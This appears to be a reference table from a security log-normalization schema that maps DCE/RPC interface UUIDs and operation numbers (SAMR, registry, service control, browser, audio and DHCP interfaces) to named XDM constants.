12345778-1234-abcd-ef00-0123456789ac:54 XDM_CONST.DCERPC_OPERATION_SAMR_OEM_CHANGE_PASSWORD_USER2

12345778-1234-abcd-ef00-0123456789ac:55 XDM_CONST.DCERPC_OPERATION_SAMR_UNICODE_CHANGE_PASSWORD_USER2

12345778-1234-abcd-ef00-0123456789ac:56 XDM_CONST.DCERPC_OPERATION_SAMR_GET_DOMAIN_PASSWORD_INFORMATION

12345778-1234-abcd-ef00-0123456789ac:57 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT2

12345778-1234-abcd-ef00-0123456789ac:58 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_USER2

12345778-1234-abcd-ef00-0123456789ac:59 XDM_CONST.DCERPC_OPERATION_SAMR_SET_BOOT_KEY_INFORMATION

12345778-1234-abcd-ef00-0123456789ac:60 XDM_CONST.DCERPC_OPERATION_SAMR_GET_BOOT_KEY_INFORMATION

12345778-1234-abcd-ef00-0123456789ac:61 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT3

12345778-1234-abcd-ef00-0123456789ac:62 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT4

12345778-1234-abcd-ef00-0123456789ac:63 XDM_CONST.DCERPC_OPERATION_SAMR_UNICODE_CHANGE_PASSWORD_USER3

12345778-1234-abcd-ef00-0123456789ac:64 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT5

12345778-1234-abcd-ef00-0123456789ac:65 XDM_CONST.DCERPC_OPERATION_SAMR_RID_TO_SID

12345778-1234-abcd-ef00-0123456789ac:66 XDM_CONST.DCERPC_OPERATION_SAMR_SET_DSRM_PASSWORD

12345778-1234-abcd-ef00-0123456789ac:67 XDM_CONST.DCERPC_OPERATION_SAMR_VALIDATE_PASSWORD

12345778-1234-abcd-ef00-0123456789ac:68 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_LOCALIZABLE_ACCOUNTS_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:69 XDM_CONST.DCERPC_OPERATION_SAMR_PERFORM_GENERIC_OPERATION

338cd001-2244-31f1-aaaa-900038001003:0 XDM_CONST.DCERPC_OPERATION_OPEN_CLASSES_ROOT

338cd001-2244-31f1-aaaa-900038001003:1 XDM_CONST.DCERPC_OPERATION_OPEN_CURRENT_USER

338cd001-2244-31f1-aaaa-900038001003:2 XDM_CONST.DCERPC_OPERATION_OPEN_LOCAL_MACHINE

338cd001-2244-31f1-aaaa-900038001003:3 XDM_CONST.DCERPC_OPERATION_OPEN_PERFORMANCE_DATA

338cd001-2244-31f1-aaaa-900038001003:4 XDM_CONST.DCERPC_OPERATION_OPEN_USERS

338cd001-2244-31f1-aaaa-900038001003:5 XDM_CONST.DCERPC_OPERATION_BASE_REG_CLOSE_KEY

338cd001-2244-31f1-aaaa-900038001003:6 XDM_CONST.DCERPC_OPERATION_BASE_REG_CREATE_KEY

338cd001-2244-31f1-aaaa-900038001003:7 XDM_CONST.DCERPC_OPERATION_BASE_REG_DELETE_KEY

338cd001-2244-31f1-aaaa-900038001003:8 XDM_CONST.DCERPC_OPERATION_BASE_REG_DELETE_VALUE

338cd001-2244-31f1-aaaa-900038001003:9 XDM_CONST.DCERPC_OPERATION_BASE_REG_ENUM_KEY

338cd001-2244-31f1-aaaa-900038001003:10 XDM_CONST.DCERPC_OPERATION_BASE_REG_ENUM_VALUE
 Original Mapped Description

338cd001-2244-31f1-aaaa-900038001003:11 XDM_CONST.DCERPC_OPERATION_BASE_REG_FLUSH_KEY

338cd001-2244-31f1-aaaa-900038001003:12 XDM_CONST.DCERPC_OPERATION_BASE_REG_GET_KEY_SECURITY

338cd001-2244-31f1-aaaa-900038001003:13 XDM_CONST.DCERPC_OPERATION_BASE_REG_LOAD_KEY

338cd001-2244-31f1-aaaa-900038001003:14 XDM_CONST.DCERPC_OPERATION_BASE_REG_NOTIFY_CHANGE_KEY_VALUE

338cd001-2244-31f1-aaaa-900038001003:15 XDM_CONST.DCERPC_OPERATION_BASE_REG_OPEN_KEY

338cd001-2244-31f1-aaaa-900038001003:16 XDM_CONST.DCERPC_OPERATION_BASE_REG_QUERY_INFO_KEY

338cd001-2244-31f1-aaaa-900038001003:17 XDM_CONST.DCERPC_OPERATION_BASE_REG_QUERY_VALUE

338cd001-2244-31f1-aaaa-900038001003:18 XDM_CONST.DCERPC_OPERATION_BASE_REG_REPLACE_KEY

338cd001-2244-31f1-aaaa-900038001003:19 XDM_CONST.DCERPC_OPERATION_BASE_REG_RESTORE_KEY

338cd001-2244-31f1-aaaa-900038001003:20 XDM_CONST.DCERPC_OPERATION_BASE_REG_SAVE_KEY

338cd001-2244-31f1-aaaa-900038001003:21 XDM_CONST.DCERPC_OPERATION_BASE_REG_SET_KEY_SECURITY

338cd001-2244-31f1-aaaa-900038001003:22 XDM_CONST.DCERPC_OPERATION_BASE_REG_SET_VALUE

338cd001-2244-31f1-aaaa-900038001003:23 XDM_CONST.DCERPC_OPERATION_BASE_REG_UN_LOAD_KEY

338cd001-2244-31f1-aaaa-900038001003:24 XDM_CONST.DCERPC_OPERATION_BASE_INITIATE_SYSTEM_SHUTDOWN

338cd001-2244-31f1-aaaa-900038001003:25 XDM_CONST.DCERPC_OPERATION_BASE_ABORT_SYSTEM_SHUTDOWN

338cd001-2244-31f1-aaaa-900038001003:26 XDM_CONST.DCERPC_OPERATION_BASE_REG_GET_VERSION

338cd001-2244-31f1-aaaa-900038001003:27 XDM_CONST.DCERPC_OPERATION_OPEN_CURRENT_CONFIG

338cd001-2244-31f1-aaaa-900038001003:28 XDM_CONST.DCERPC_OPERATION_OPEN_DYN_DATA

338cd001-2244-31f1-aaaa-900038001003:29 XDM_CONST.DCERPC_OPERATION_BASE_REG_QUERY_MULTIPLE_VALUES

338cd001-2244-31f1-aaaa-900038001003:30 XDM_CONST.DCERPC_OPERATION_BASE_INITIATE_SYSTEM_SHUTDOWN_EX

338cd001-2244-31f1-aaaa-900038001003:31 XDM_CONST.DCERPC_OPERATION_BASE_REG_SAVE_KEY_EX

338cd001-2244-31f1-aaaa-900038001003:32 XDM_CONST.DCERPC_OPERATION_OPEN_PERFORMANCE_TEXT

338cd001-2244-31f1-aaaa-900038001003:33 XDM_CONST.DCERPC_OPERATION_OPEN_PERFORMANCE_NLS_TEXT

338cd001-2244-31f1-aaaa-900038001003:34 XDM_CONST.DCERPC_OPERATION_BASE_REG_QUERY_MULTIPLE_VALUES2

338cd001-2244-31f1-aaaa-900038001003:35 XDM_CONST.DCERPC_OPERATION_BASE_REG_DELETE_KEY_EX

3919286a-b10c-11d0-9ba8-00c04fd92ef5:0 XDM_CONST.DCERPC_OPERATION_DS_ROLER_GET_PRIMARY_DOMAIN_INFORMATION

3919286a-b10c-11d0-9ba8-00c04fd92ef5:1 XDM_CONST.DCERPC_OPERATION_DS_ROLER_DNS_NAME_TO_FLAT_NAME

3919286a-b10c-11d0-9ba8-00c04fd92ef5:2 XDM_CONST.DCERPC_OPERATION_DS_ROLER_DC_AS_DC

3919286a-b10c-11d0-9ba8-00c04fd92ef5:3 XDM_CONST.DCERPC_OPERATION_DS_ROLER_DC_AS_REPLICA

3919286a-b10c-11d0-9ba8-00c04fd92ef5:4 XDM_CONST.DCERPC_OPERATION_DS_ROLER_DEMOTE_DC

3919286a-b10c-11d0-9ba8-00c04fd92ef5:5 XDM_CONST.DCERPC_OPERATION_DS_ROLER_GET_DC_OPERATION_PROGRESS

3919286a-b10c-11d0-9ba8-00c04fd92ef5:6 XDM_CONST.DCERPC_OPERATION_DS_ROLER_GET_DC_OPERATION_RESULTS

3919286a-b10c-11d0-9ba8-00c04fd92ef5:7 XDM_CONST.DCERPC_OPERATION_DS_ROLER_CANCEL

3919286a-b10c-11d0-9ba8-00c04fd92ef5:8 XDM_CONST.DCERPC_OPERATION_DS_ROLER_SERVER_SAVE_STATE_FOR_UPGRADE

3919286a-b10c-11d0-9ba8-00c04fd92ef5:9 XDM_CONST.DCERPC_OPERATION_DS_ROLER_UPGRADE_DOWNLEVEL_SERVER

3919286a-b10c-11d0-9ba8-00c04fd92ef5:10 XDM_CONST.DCERPC_OPERATION_DS_ROLER_ABORT_DOWNLEVEL_SERVER_UPGRADE

367abb81-9844-35f1-ad32-98f038001003:0 XDM_CONST.DCERPC_OPERATION_CLOSE_SERVICE_HANDLE

367abb81-9844-35f1-ad32-98f038001003:1 XDM_CONST.DCERPC_OPERATION_CONTROL_SERVICE

367abb81-9844-35f1-ad32-98f038001003:2 XDM_CONST.DCERPC_OPERATION_DELETE_SERVICE

367abb81-9844-35f1-ad32-98f038001003:3 XDM_CONST.DCERPC_OPERATION_LOCK_SERVICE_DATABASE

367abb81-9844-35f1-ad32-98f038001003:4 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_OBJECT_SECURITY
 Original Mapped Description

367abb81-9844-35f1-ad32-98f038001003:5 XDM_CONST.DCERPC_OPERATION_SET_SERVICE_OBJECT_SECURITY

367abb81-9844-35f1-ad32-98f038001003:6 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_STATUS

367abb81-9844-35f1-ad32-98f038001003:7 XDM_CONST.DCERPC_OPERATION_SET_SERVICE_STATUS

367abb81-9844-35f1-ad32-98f038001003:8 XDM_CONST.DCERPC_OPERATION_UNLOCK_SERVICE_DATABASE

367abb81-9844-35f1-ad32-98f038001003:9 XDM_CONST.DCERPC_OPERATION_NOTIFY_BOOT_CONFIG_STATUS

367abb81-9844-35f1-ad32-98f038001003:10 XDM_CONST.DCERPC_OPERATION_SC_SET_SERVICE_BITS_W

367abb81-9844-35f1-ad32-98f038001003:11 XDM_CONST.DCERPC_OPERATION_CHANGE_SERVICE_CONFIG_W

367abb81-9844-35f1-ad32-98f038001003:12 XDM_CONST.DCERPC_OPERATION_CREATE_SERVICE_W

367abb81-9844-35f1-ad32-98f038001003:13 XDM_CONST.DCERPC_OPERATION_ENUM_DEPENDENT_SERVICES_W

367abb81-9844-35f1-ad32-98f038001003:14 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICES_STATUS_W

367abb81-9844-35f1-ad32-98f038001003:15 XDM_CONST.DCERPC_OPERATION_OPEN_SC_MANAGER_W

367abb81-9844-35f1-ad32-98f038001003:16 XDM_CONST.DCERPC_OPERATION_OPEN_SERVICE_W

367abb81-9844-35f1-ad32-98f038001003:17 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_CONFIG_W

367abb81-9844-35f1-ad32-98f038001003:18 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_LOCK_STATUS_W

367abb81-9844-35f1-ad32-98f038001003:19 XDM_CONST.DCERPC_OPERATION_START_SERVICE_W

367abb81-9844-35f1-ad32-98f038001003:20 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_DISPLAY_NAME_W

367abb81-9844-35f1-ad32-98f038001003:21 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_KEY_NAME_W

367abb81-9844-35f1-ad32-98f038001003:22 XDM_CONST.DCERPC_OPERATION_SC_SET_SERVICE_BITS_A

367abb81-9844-35f1-ad32-98f038001003:23 XDM_CONST.DCERPC_OPERATION_CHANGE_SERVICE_CONFIG_A

367abb81-9844-35f1-ad32-98f038001003:24 XDM_CONST.DCERPC_OPERATION_CREATE_SERVICE_A

367abb81-9844-35f1-ad32-98f038001003:25 XDM_CONST.DCERPC_OPERATION_ENUM_DEPENDENT_SERVICES_A

367abb81-9844-35f1-ad32-98f038001003:26 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICES_STATUS_A

367abb81-9844-35f1-ad32-98f038001003:27 XDM_CONST.DCERPC_OPERATION_OPEN_SC_MANAGER_A

367abb81-9844-35f1-ad32-98f038001003:28 XDM_CONST.DCERPC_OPERATION_OPEN_SERVICE_A

367abb81-9844-35f1-ad32-98f038001003:29 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_CONFIG_A

367abb81-9844-35f1-ad32-98f038001003:30 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_LOCK_STATUS_A

367abb81-9844-35f1-ad32-98f038001003:31 XDM_CONST.DCERPC_OPERATION_START_SERVICE_A

367abb81-9844-35f1-ad32-98f038001003:32 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_DISPLAY_NAME_A

367abb81-9844-35f1-ad32-98f038001003:33 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_KEY_NAME_A

367abb81-9844-35f1-ad32-98f038001003:34 XDM_CONST.DCERPC_OPERATION_SC_GET_CURRENT_GROUP_STATE_W

367abb81-9844-35f1-ad32-98f038001003:35 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICE_GROUP_W

367abb81-9844-35f1-ad32-98f038001003:36 XDM_CONST.DCERPC_OPERATION_CHANGE_SERVICE_CONFIG2_A

367abb81-9844-35f1-ad32-98f038001003:37 XDM_CONST.DCERPC_OPERATION_CHANGE_SERVICE_CONFIG2_W

367abb81-9844-35f1-ad32-98f038001003:38 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_CONFIG2_A

367abb81-9844-35f1-ad32-98f038001003:39 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_CONFIG2_W

367abb81-9844-35f1-ad32-98f038001003:40 XDM_CONST.DCERPC_OPERATION_QUERY_SERVICE_STATUS_EX

367abb81-9844-35f1-ad32-98f038001003:41 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICES_STATUS_EX_A

367abb81-9844-35f1-ad32-98f038001003:42 XDM_CONST.DCERPC_OPERATION_ENUM_SERVICES_STATUS_EX_W

367abb81-9844-35f1-ad32-98f038001003:43 XDM_CONST.DCERPC_OPERATION_SC_SEND_TS_MESSAGE

367abb81-9844-35f1-ad32-98f038001003:44 XDM_CONST.DCERPC_OPERATION_CREATE_SERVICE_WOW64_A

367abb81-9844-35f1-ad32-98f038001003:45 XDM_CONST.DCERPC_OPERATION_CREATE_SERVICE_WOW64_W
 Original Mapped Description

367abb81-9844-35f1-ad32-98f038001003:46 XDM_CONST.DCERPC_OPERATION_SC_QUERY_SERVICE_TAG_INFO

367abb81-9844-35f1-ad32-98f038001003:47 XDM_CONST.DCERPC_OPERATION_NOTIFY_SERVICE_STATUS_CHANGE

367abb81-9844-35f1-ad32-98f038001003:48 XDM_CONST.DCERPC_OPERATION_GET_NOTIFY_RESULT

367abb81-9844-35f1-ad32-98f038001003:49 XDM_CONST.DCERPC_OPERATION_CLOSE_NOTIFY_HANDLE

367abb81-9844-35f1-ad32-98f038001003:50 XDM_CONST.DCERPC_OPERATION_CONTROL_SERVICE_EX_A

367abb81-9844-35f1-ad32-98f038001003:51 XDM_CONST.DCERPC_OPERATION_CONTROL_SERVICE_EX_W

367abb81-9844-35f1-ad32-98f038001003:52 XDM_CONST.DCERPC_OPERATION_SC_SEND_PN_P_MESSAGE

367abb81-9844-35f1-ad32-98f038001003:53 XDM_CONST.DCERPC_OPERATION_SC_VALIDATE_PN_P_SERVICE

367abb81-9844-35f1-ad32-98f038001003:54 XDM_CONST.DCERPC_OPERATION_SC_OPEN_SERVICE_STATUS_HANDLE

6bffd098-a112-3610-9833-012892020162:0 XDM_CONST.DCERPC_OPERATION_BROWSER_SERVER_ENUM

6bffd098-a112-3610-9833-012892020162:1 XDM_CONST.DCERPC_OPERATION_BROWSER_DEBUG_CALL

6bffd098-a112-3610-9833-012892020162:2 XDM_CONST.DCERPC_OPERATION_BROWSER_QUERY_OTHER_DOMAINS

6bffd098-a112-3610-9833-012892020162:3 XDM_CONST.DCERPC_OPERATION_BROWSER_RESET_NETLOGON_STATE

6bffd098-a112-3610-9833-012892020162:4 XDM_CONST.DCERPC_OPERATION_BROWSER_DEBUG_TRACE

6bffd098-a112-3610-9833-012892020162:5 XDM_CONST.DCERPC_OPERATION_BROWSER_QUERY_STATISTICS

6bffd098-a112-3610-9833-012892020162:6 XDM_CONST.DCERPC_OPERATION_BROWSER_RESET_STATISTICS

6bffd098-a112-3610-9833-012892020162:7 XDM_CONST.DCERPC_OPERATION_NETR_BROWSER_STATISTICS_CLEAR

6bffd098-a112-3610-9833-012892020162:8 XDM_CONST.DCERPC_OPERATION_NETR_BROWSER_STATISTICS_GET

6bffd098-a112-3610-9833-012892020162:9 XDM_CONST.DCERPC_OPERATION_BROWSER_SET_NETLOGON_STATE

6bffd098-a112-3610-9833-012892020162:10 XDM_CONST.DCERPC_OPERATION_BROWSER_QUERY_EMULATED_DOMAINS

6bffd098-a112-3610-9833-012892020162:11 XDM_CONST.DCERPC_OPERATION_BROWSER_SERVER_ENUM_EX

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:0 XDM_CONST.DCERPC_OPERATION_GFX_CREATE_ZONE_FACTORIES_LIST

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:1 XDM_CONST.DCERPC_OPERATION_GFX_CREATE_GFX_FACTORIES_LIST

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:2 XDM_CONST.DCERPC_OPERATION_GFX_CREATE_GFX_LIST

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:3 XDM_CONST.DCERPC_OPERATION_GFX_REMOVE_GFX

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:4 XDM_CONST.DCERPC_OPERATION_GFX_ADD_GFX

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:5 XDM_CONST.DCERPC_OPERATION_GFX_MODIFY_GX

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:6 XDM_CONST.DCERPC_OPERATION_GFX_OPEN_GFX

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:7 XDM_CONST.DCERPC_OPERATION_GFX_LOGON

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:8 XDM_CONST.DCERPC_OPERATION_GFX_LOGOFF

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:9 XDM_CONST.DCERPC_OPERATION_WINMM_REGISTER_SESSION_NOTIFICATION_EVENT

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:10 XDM_CONST.DCERPC_OPERATION_WINMM_UNREGISTER_SESSION_NOTIFICATION

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:11 XDM_CONST.DCERPC_OPERATION_WINMM_SESSION_CONNECT_STATE

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:12 XDM_CONST.DCERPC_OPERATION_WDM_DRIVER_OPEN_DRV_REG_KEY

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:13 XDM_CONST.DCERPC_OPERATION_WINMM_ADVISE_PREFERRED_DEVICE_CHANGE

3faf4738-3a21-4307-b46c-fdda9bb8c0d5:14 XDM_CONST.DCERPC_OPERATION_WINMM_GET_PNP_INFO

c386ca3e-9061-4a72-821e-498d83be188f:0 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_CONNECT

c386ca3e-9061-4a72-821e-498d83be188f:1 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_DISCONNECT

c386ca3e-9061-4a72-821e-498d83be188f:2 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_INITIALIZE

c386ca3e-9061-4a72-821e-498d83be188f:3 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_AUDIO_SESSION

c386ca3e-9061-4a72-821e-498d83be188f:4 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_CREATE_STREAM
 Original Mapped Description

c386ca3e-9061-4a72-821e-498d83be188f:5 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_DESTROY_STREAM

c386ca3e-9061-4a72-821e-498d83be188f:6 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_STREAM_LATENCY

c386ca3e-9061-4a72-821e-498d83be188f:7 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_MIX_FORMAT

c386ca3e-9061-4a72-821e-498d83be188f:8 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_IS_FORMAT_SUPPORTED

c386ca3e-9061-4a72-821e-498d83be188f:9 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_DEVICE_PERIOD

c386ca3e-9061-4a72-821e-498d83be188f:10 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_MASTER_VOLUME_LEVEL_SCALAR

c386ca3e-9061-4a72-821e-498d83be188f:11 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_PROCESS_ID

c386ca3e-9061-4a72-821e-498d83be188f:12 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_STATE

c386ca3e-9061-4a72-821e-498d83be188f:13 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_LAST_ACTIVATION

c386ca3e-9061-4a72-821e-498d83be188f:14 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_LAST_INACTIVATION

c386ca3e-9061-4a72-821e-498d83be188f:15 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_IS_SYSTEM_SOUNDS_SESSION

c386ca3e-9061-4a72-821e-498d83be188f:16 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_DISPLAY_NAME

c386ca3e-9061-4a72-821e-498d83be188f:17 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_DISPLAY_NAME

c386ca3e-9061-4a72-821e-498d83be188f:18 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_SESSION_CLASS

c386ca3e-9061-4a72-821e-498d83be188f:19 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_SESSION_CLASS

c386ca3e-9061-4a72-821e-498d83be188f:20 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_VOLUME

c386ca3e-9061-4a72-821e-498d83be188f:21 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_VOLUME

c386ca3e-9061-4a72-821e-498d83be188f:22 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_MUTE

c386ca3e-9061-4a72-821e-498d83be188f:23 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_MUTE

c386ca3e-9061-4a72-821e-498d83be188f:24 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_CHANNEL_COUNT

c386ca3e-9061-4a72-821e-498d83be188f:25 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_CHANNEL_VOLUME

c386ca3e-9061-4a72-821e-498d83be188f:26 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_CHANNEL_VOLUME

c386ca3e-9061-4a72-821e-498d83be188f:27 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_SET_ALL_VOLUMES

c386ca3e-9061-4a72-821e-498d83be188f:28 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_ALL_VOLUMES

c386ca3e-9061-4a72-821e-498d83be188f:29 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_DISCONNECT

c386ca3e-9061-4a72-821e-498d83be188f:30 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_MIX_FORMAT

c386ca3e-9061-4a72-821e-498d83be188f:31 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_GET_DEVICE_FORMAT

c386ca3e-9061-4a72-821e-498d83be188f:32 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_SET_DEVICE_FORMAT

c386ca3e-9061-4a72-821e-498d83be188f:33 XDM_CONST.DCERPC_OPERATION_AUDIO_SERVER_GET_DEVICE_PERIOD

c386ca3e-9061-4a72-821e-498d83be188f:34 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_SET_PROCESSING_PERIOD

c386ca3e-9061-4a72-821e-498d83be188f:35 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_GET_SHARE_MODE

c386ca3e-9061-4a72-821e-498d83be188f:36 XDM_CONST.DCERPC_OPERATION_POLICY_CONFIG_SET_SHARE_MODE

c386ca3e-9061-4a72-821e-498d83be188f:37 XDM_CONST.DCERPC_OPERATION_GET_AUDIO_SESSION_MANAGER

c386ca3e-9061-4a72-821e-498d83be188f:38 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_DESTROY

c386ca3e-9061-4a72-821e-498d83be188f:39 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_GET_AUDIO_SESSION

c386ca3e-9061-4a72-821e-498d83be188f:40 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_GET_CURRENT_SESSION

c386ca3e-9061-4a72-821e-498d83be188f:41 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_GET_EXISTING_SESSION

c386ca3e-9061-4a72-821e-498d83be188f:42 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_ADD_AUDIO_SESSION_CLIENT_NOTIFICATION

c386ca3e-9061-4a72-821e-498d83be188f:43 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_DELETE_AUDIO_SESSION_CLIENT_NOTIFICATION

c386ca3e-9061-4a72-821e-498d83be188f:44 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_MANAGER_ADD_AUDIO_SESSION_CLIENT_NOTIFICATION

c386ca3e-9061-4a72-821e-498d83be188f:45 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_CONNECT
 Original Mapped Description

c386ca3e-9061-4a72-821e-498d83be188f:46 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_DISCONNECT

c386ca3e-9061-4a72-821e-498d83be188f:47 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_CHANNEL_COUNT

c386ca3e-9061-4a72-821e-498d83be188f:48 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_MASTER_VOLUME_LEVEL

c386ca3e-9061-4a72-821e-498d83be188f:49 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_MASTER_VOLUME_LEVEL_SCALAR

c386ca3e-9061-4a72-821e-498d83be188f:50 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_MASTER_VOLUME_LEVEL

c386ca3e-9061-4a72-821e-498d83be188f:51 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_MASTER_VOLUME_LEVEL_SCALAR

c386ca3e-9061-4a72-821e-498d83be188f:52 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_CHANNEL_VOLUME_LEVEL

c386ca3e-9061-4a72-821e-498d83be188f:53 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_CHANNEL_VOLUME_LEVEL_SCALAR

c386ca3e-9061-4a72-821e-498d83be188f:54 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_CHANNEL_VOLUME_LEVEL

c386ca3e-9061-4a72-821e-498d83be188f:55 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_CHANNEL_VOLUME_LEVEL_SCALAR

c386ca3e-9061-4a72-821e-498d83be188f:56 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_SET_MUTE

c386ca3e-9061-4a72-821e-498d83be188f:57 XDM_CONST.DCERPC_OPERATION_AUDIO_SESSION_GET_DISPLAY_NAME

c386ca3e-9061-4a72-821e-498d83be188f:58 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_ADD_MASTER_VOLUME_NOTIFICATION

c386ca3e-9061-4a72-821e-498d83be188f:59 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_DELETE_MASTER_VOLUME_NOTIFICATION

c386ca3e-9061-4a72-821e-498d83be188f:60 XDM_CONST.DCERPC_OPERATION_AUDIO_METER_GET_AVERAGE_RMS

c386ca3e-9061-4a72-821e-498d83be188f:61 XDM_CONST.DCERPC_OPERATION_AUDIO_METER_GET_CHANNELS_RMS

c386ca3e-9061-4a72-821e-498d83be188f:62 XDM_CONST.DCERPC_OPERATION_AUDIO_METER_GET_PEAK_VALUE

c386ca3e-9061-4a72-821e-498d83be188f:63 XDM_CONST.DCERPC_OPERATION_AUDIO_METER_GET_CHANNELS_PEAK_VALUES

c386ca3e-9061-4a72-821e-498d83be188f:64 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_GET_STEP_INFO

c386ca3e-9061-4a72-821e-498d83be188f:65 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_STEP_UP

c386ca3e-9061-4a72-821e-498d83be188f:66 XDM_CONST.DCERPC_OPERATION_AUDIO_VOLUME_STEP_DOWN

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6:0 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REQUEST_PREFIX

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6:1 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RENEW_PREFIX

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6:2 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RELEASE_PREFIX

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6:3 XDM_CONST.DCERPC_OPERATION_RPC_SRV_REQUEST_PARAMS

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:0 XDM_CONST.DCERPC_OPERATION_RPC_SRV_ENABLE_DHCP

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:1 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RENEW_LEASE

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:2 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RENEW_LEASE_BY_BROADCAST

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:3 XDM_CONST.DCERPC_OPERATION_RPC_SRV_RELEASE_LEASE

3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5:4 XDM_CONST.DCERPC_OPERATION_RPC_SRV_SET_FALLBACK_PARAMS

